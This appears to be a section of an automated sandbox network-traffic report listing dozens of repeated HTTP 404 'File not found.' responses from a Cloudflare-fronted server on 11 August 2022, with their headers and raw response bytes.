                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hjmr%2BbPvZ8rJwWgffZI2qiEiavpl6O22f%2BcT7CB7tnbyuPOA357Zf2FNxPVWIvbMb8Ndmpi8h9MOOPpjYMpVs8g7ts%2B3HNgz92kV0CK9kX0Lqi1trxOEgmN37zwvtA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dadc8f29a21-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M7ABObsXbQcHdnhtJPI8XreO6Qwq10iYwVNciyewQ4rLsb7Pcx09BNdkyXLXs9ydJd52ebLqkg3Ye7uOK2DeXYCKDW1duAcls9jdV3KDrYwI1Ddm7lqJGDb603ptNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4db41affbbf7-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mgEHyzNGG3wTlvIqrFT9Qg9CyoJJco9av7NNGpAxa4Lv150iQghRp9kjVuXQ7MMVm025fTNlO4GAiU0JtozkA90G4dr6yvHcKVA0lMkDoG%2BgwlguHut59hkTKxPVSA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dbb0f449bbc-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WSuTK3xmdvnC9SqK9C3Kq8XKsdf7rSOiPJ%2B%2B9ZxDB06tiwdevw3TNAATZmNMvGVEVg9KMwbf3%2BoFJ2siKx%2BGf5kYUXLsWwINIX3uVE6oCo9rZDzlcazlVHOgpMj%2Bzg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dc31d919156-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IusO3PS%2BNxKdc1pE1bhnckIxsL5IUfCMg2N0ixhg1CJ8YDJ1sexeannt%2BdOuWAWENyuH9TYSsv6kia7W5E0PwtJhXkXW0Vn8XxMvKbR1Rut7thDprsdBL3x8jct0aw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dc9eb03bb55-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=56rajt1WPGe6KnsyYpZpLkWvcP2gK8oIufFApjC%2FlsRIRyLWAm0lgxAy74kgONnMisbKHxHnGCoj54gIwS1elPMY2YeNpmVi5jQ8TAhhFOqYDjKiWLZCRQTUqZHBNg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dd09aad6940-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ut9B7mf4G17zu3N9HtfdKLQB4vnnYZyFkcj3DiKeaTp6lkOkH0%2BG1RXZfAd1eHXyrbhOy35lhzComx8GvR8btMp2ypwuCSvqRR%2BPT%2FdC4VdZgby%2Bxpk5t%2BA4Fic1SA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dd7aae99225-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=G8RWXJ9cQ2lTbZIEiakeL%2BvJlw7GBQj5v6W8jHCN0RVD8MFGd3iAhGRjGRgY3kgjTkeYk5seGXg0mRicQQEFnc%2Fe90OlZ%2BzjF7i0rG%2F%2F5CMfbS%2FOvsPqEIVJpPmwCg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dde7991906c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NuFLm1%2BetFHr9%2F4RJj%2BfSY56%2Fyp%2F44kO%2BagWi8qLS5jmc3FWNYuuuS4dryA9ihrHDUpS5jRl4o9C1ZwUh9G2L3ovG1mleSN4EqUy7Wz4Vh32S1WXkdj5%2B7O52BO4hw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4de58e089025-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JxjXC6ddbJvscFIvG67IgynL2NjLWwlHrf9JNEEpnZhz8GESrErKZ%2BoLBEDeoVxgiwJfVn0Q6Rqu8otxBsF8PXAbqITi5CmVFXMAKxISbPKHDQgqi9tRB4N6epT2qg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dec49fdbb79-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tZTVwoY2KgEFJBINwtqpf4sdTlqYetdrjrRijQZX5Mweayj6DCpYK6tzY8LykMUrMSDsSPGBVilViH644WA9fbXc0g6ig6D5Ubp07wbwXjkLbh86zB8cT4bqPxyqsw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4df39917927a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DLqIBQAFj4gswdHMZuHcj91in6E5f6X3rFMoKk2nEIGUMSZ2Nxf9I4OnjRKO0naduLb%2BueBvh97gRd%2BU%2FaetEzg1vRoUKSp6dcqJzvCnpBITGp00qUPZwKWw%2Bj2BeQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4dfa7bdcbb7a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BjqGLd6i9zMP8bcIwUWRGVed2wLUSsm3niQjeu0rUJ%2FcbE6oMHKVIi%2BOomjB7LoB%2F4A1uT%2BXqpcZ%2BWLmbZT%2B4dqHCLfO7Pfl1GolCHzGQ5dzsPMqGjmZ7b6xaz7QbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e013cb5693a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DT2h4w8l%2FP6VjmZr53R42CuyMFDOYqdNxPcSNr2UXMwc5QDOgwXzVoomGjhqGdK%2BBspu1iOAHpJuUv%2BjCNwmP8uG1MIyC10AF9Et%2FDju8VAihCOxHNiSXGyG%2BZWINg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e07da98929c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6a1VTXiCKYgnYEO3%2BLpn9oT%2BJ3bOdwQwxtmEYnRXBoF1b2vToJ1LtvkZ1ubI9oYCjF4ZxHdY27qlfBR97QKEKZpuLDGAPkXyaO5gRLySOhDtATM7v%2Bp%2B2VfFc2lo9g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e0f190d9119-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pD6Ln9hJRHjfUxa%2BWE43LFbFNzvbGolnLYC5OP0S2USHgWDZw%2FHEYVnJyWrqjinKtzJoFB9DDiks%2BfRYqYcO6kXROO6nZQW0t1xoGJxTokqwElIuBPwLJT667KYPdA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e159a1e915c-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LklYK3MOypuF1%2BVh2sdCtr7LVNtvn%2F19I6qHXiEHaYlXr1GlNl5FV85gZ1YwjH%2BWP3mMaxA%2FOiai0RRg1k%2FJj1BTJT0GFYgOIysXL7HlbvsawYmrc2QRDHTejstVTw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e1c1b099182-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JvllRByjfWTtFWpXg1mKOcP73Q4nqUNK9RIelUCIa9JSpEbSgDMsJfWvwFLMqFKuhwzLWUjzARThWb5gHEZ%2B2nNJeog1S%2BjB0M5cAqiaMNoKriWuzsc3a6MuwY9C4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e23c9e2995a-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HH6Mm6OzeElam41sNPkt1IqJqvterxwkCTH6ccOLDK2%2FP45mgrw2tmT%2FgIuKaBnXiwgm7yZxh1c1twzMg8H%2BZxDubCT3iEDeETTRJWPEP0dPg7eaMyzfviA1nd6Nhw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e2a8f32bbd9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BDDcJA9loNSYiH0%2BzGFmVbKmzSb%2Ff5hpB1MM20uTsti37mQygz7a4phBDXPmpiRJpWyppkWO1aCufCSBc61S3fu9WYSM8a3mgQ9baO8%2FIg4rJNzKepSDyKU5TN5C7Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e36c9bb5c50-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0NEMPzCv%2BglpdrXSrBrz41omROycORcGwZRT8uzlQMUlk9El6ItPaLC0Fo6hrzsBTBR%2Bgbawx8OEpKTh5mEACiFWQH3CR3z30oVs%2BC%2FSx0oRn4PnrWKdRHDRuREQvg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e4bcaa1bbf5-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TUYSQmDNLM25L3Xc5iUuFUSvf59cAHIJ%2FyW%2FdECVdBBKZeP7djubS9URGb%2B504ohSvLJdBV5cJr%2BQkwAyXFP0K6zoiBUy0%2BSXhh%2BWUAlw%2B7PQuD8mVJaui9lgSztuw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e579eecbb85-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E7vSqzyZk3qIwXx9eUocaI9hXGtrWZPhFgRL0EBT5ZsuSpNKLZmWOC1rHM36XQm4Si%2FsrLKJFtM4XlTXuHulsyaWTJ9knN%2BaJT8klsOGYIdLAk0HH3jyCnb6Mgt4aQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e615e119bb3-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=S4oxOBWv%2B4UOVMwb0kDScW1nQwQrd5EacUvdKMaUqDq9Z1JWbQ1YF%2FYBVr7gB1AuQpiog2uSyIguk96hVrenhW0UVTED95Y8lUk9jln%2FKYpiuz5llJWMVaTU2P9upQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e69acc4bb86-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:45 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CTFZF%2BWEcf%2FZ3ve0OTQGqdgiQcRFWglSF2ioHkR1%2B1Dt8yFUGv%2FbQkYy3SgYWtYfRTt%2Fu1iWEP2lKl5AFOepBLjGhytA9dH7hUwySrO%2FraUqHxKumZ8Zds8T3nsBFw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e710fd8926d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KE5YLOzAxfxUnOqS9Yf%2Fh%2FyGk7n8MwLfQafrSeANUvgLxd5QwzD7KKvTWDJjn0hBBTMgo0iyw9pagijUx6QdFa01qDWZr6PsnY4%2BoTD0nvKrpk2M20K6fr86jy04vw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e7b6f759b95-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:49 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x4NOgxjp5bamSb5%2BEGCU0lIDm14biGjteevVZ1anxZu4L0uIwVi%2F4E6I8kDhwGQjgjRvJ0SlP3vpL9jSfqjTJGOkNcR57X%2FhUTbcaZ3QMoTrnypJ%2B1ZRujwexFap4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e893a77bc01-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:50 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R8wPA8bakoFeAux%2BPghUTfYdyrLQJAPleFgfZf1TztZzoaXyuxTpp%2BY3m%2BZn8tBonTuOV6rdaOFSE7zkck%2FyMJ1y6CBC5ezSeohSLmU73ysrJ1IDe9iQzJ1%2BSFTulg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e921cecbb32-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0in6Ayj8I3zO6NO1iFxs%2Bdf30Iekyj2pJivQsyFDdGqf%2Fdfsg4DG5bw119gvvuAAXzm1JIN5aN1ROwd%2BBLhLBUlg7X7WLzIMXsz6zOalbMhpxzCC9JW6xboqYwa3lg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4e9a4dd19b57-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pgNEJXZGOHn5Egc%2FCUfGGyJgE0wCr2whFXS4CpUoV5rbFo71CqRWstxCdJot%2BnpztUTC6k4pFu4PcMAf8lGER02%2FUesG3wyV3uvFGhNzYS2f3WfRSY%2F07O3swpFd5Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4ea2af54bba9-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 11 Aug 2022 04:42:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Oz58tFC9j%2F%2FUWYTDA2KIPUhsEEJLq3Fj%2F%2FNjwIxsOu3JbAS5a4UeBpXda4G3IGkrnybQ309H0O4WVRE4wWmTnDnp5%2BTOCGJvzW5H1baNzJblY%2BgusnlFAaq0GMzbVQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 738e4ea9998f915e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
